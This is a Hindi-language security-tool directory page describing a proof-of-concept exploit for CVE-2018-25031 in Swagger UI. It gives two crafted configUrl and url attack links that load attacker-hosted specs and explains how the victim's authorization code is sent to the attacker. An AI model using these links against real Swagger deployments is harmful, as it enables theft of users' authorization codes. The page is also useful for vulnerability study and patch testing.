Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2018-25031 — CVE-2018-25031 (Swagger UI XSS) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड configUrl/url पैरामीटर के माध्यम से प्राधिकरण कोड एक्सफिल्ट्रेट करता है। | Kitploit
उपकरण/GitHubGitHub/geozin/poc-cve-2018-25031
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणसामाजिक इंजीनियरिंग
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

CVE-2018-25031 (Swagger UI XSS) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड configUrl/url पैरामीटर के माध्यम से प्राधिकरण कोड एक्सफिल्ट्रेट करता है।

रिपॉजिटरी देखें
152 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-25031 - Swagger UI 4.1.3 से पहले

एक सरल POC (CVE-2018-25031) जो पीड़ित को प्राधिकरण कोड दर्ज करने के लिए धोखा देता है, जो फिर हमलावर को भेज दिया जाता है।
आप इसे XSS भेद्यता के साथ उपयोग कर सकते हैं https://github.com/VictorNS69/swagger-ui-xss

पैरामीटर ढूंढना और सही फ़ाइल निर्दिष्ट करना आवश्यक है: configUrl के लिए JSON फ़ाइल, और url के लिए YAML फ़ाइल।

उदाहरण:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

स्क्रीनशॉट:


जब पीड़ित प्राधिकरण कोड दर्ज करके API का उपयोग करने का प्रयास करता है और Execute पर क्लिक करता है, तो उन्हें कुछ भी प्रदर्शित नहीं होगा। हालांकि, प्राधिकरण कोड के साथ एक अनुरोध हमलावर के URL पर भेज दिया जाएगा।

संदर्भ:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

टूल डाउनलोड करें